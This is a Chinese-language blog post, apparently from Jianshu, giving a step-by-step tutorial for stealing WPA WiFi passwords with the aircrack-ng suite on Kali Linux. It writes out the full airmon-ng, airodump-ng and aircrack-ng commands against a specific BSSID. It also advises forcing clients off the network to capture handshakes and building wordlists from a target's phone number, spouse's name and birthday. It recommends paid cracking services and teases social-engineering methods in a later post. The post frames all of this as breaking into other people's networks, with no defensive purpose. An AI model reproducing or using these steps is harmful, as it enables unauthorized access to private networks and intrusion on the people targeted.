wifi滲透:盜wifi密碼1.0

現在90%的wifi都是采用的wpa的認證保護方式,我只見過一個用wep的,所以我們先把骨頭扔一邊,先來啃一下這塊牛肉。

WPA :Wi-Fi Protected Access,中文譯名為Wi-Fi網絡安全存取,WPA可保證WLAN用戶的數據受到保護,并且只有授權的網絡用戶才可以訪問WLAN網絡。

每個制度都有他的漏洞

我們先來講一下最常見的破解方式,使用aircrack套件來抓包跑字典


?????????????????????????????????????????????? 搭建環境

1.一臺路由器,使用wpa加密

2.kali系統

3.無線網卡


??????????????????????????????????????????????? 開始實現

1.加載網卡進入虛擬機

2.輸入ifconfig -a

發現wlan0,說明網卡加載成功,不一定名字非得是這個才行,加載成功了就ok

3.輸入airmon-ng start wlan0,打開混雜模式

系統說讓我們關一下那些進程,那我們就關一下

4.輸入airodump-ng wlan0mon查看一些周圍無線網絡狀況,找到我們要攻擊的網絡,記錄BSSID和CH

今天用110來試試手,bssid:C8:3A:35:2B:B0:88,ch:8

ctrl+c結束此過程

5.輸入airodump-ng -c 8 --bssid C8:3A:35:2B:B0:88 -w /root wlan0mon

kali的命令行下是區分大小寫的。

出現右上角的那個說明抓包成功,包是以.cap結尾的

6.把包從計算機中移到主文件夾下,現在開始跑字典

輸入aircrack-ng? -w /usr/share/wordlists/fasttrack.txt ~/root-01.cap

這就是我們跑出來的的wifi密碼

參數:

-w:指定字典,現在最新的2017版kali下有很多字典,你也可以自己做字典上傳上去

前面的是字典路徑,后面的是剛剛抓的wpa連接包的路徑。有時候你找不到他或者不知道他的路徑,你就移到主文件夾下,主文件夾的路徑為/root

其中有時候你很長時間抓不到他的握手包,你可以用我們之前學過的各種斷網命令,斷一下然后他就會重新握手。




???????????????????????????????????????? 實驗總結

其實跑字典是很不明智的,不僅靠字典的強大,更要有強大的計算機和一點點的運氣成分,如果wifi密碼設成15df#$326ryyu&*$2這種的,數字加字母加特殊符號十幾位的,很難被破出來。

如果實在要破解一個人的wifi,先搜集信息,手機號,愛人姓名,生日,再加上常規的一些弱密碼做出來一個字典,先拿這個簡易的字典跑一下,如果跑不出來,就去找一下網上的一些專業跑包組織,跑不出來不要錢,一般跑一個包也就要10元錢。

之后我會說一些社會工程學盜wifi密碼的,人性是系統中最薄弱的環節

閑著無聊去看一下米特尼克的事跡吧很傳奇的一個人他還有一本書《欺騙的藝術》,我看著里面的各種吹逼,看一半就看不下去了,跳著看完了,但那就是人家的真實情景,所以我是服服帖帖的沒話說....還有一本書《社會工程學2》,從淘寶上買影印版的,這個是個中國人寫的書,符合中國國情,直接搬過來都能用。

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。

推薦閱讀更多精彩內容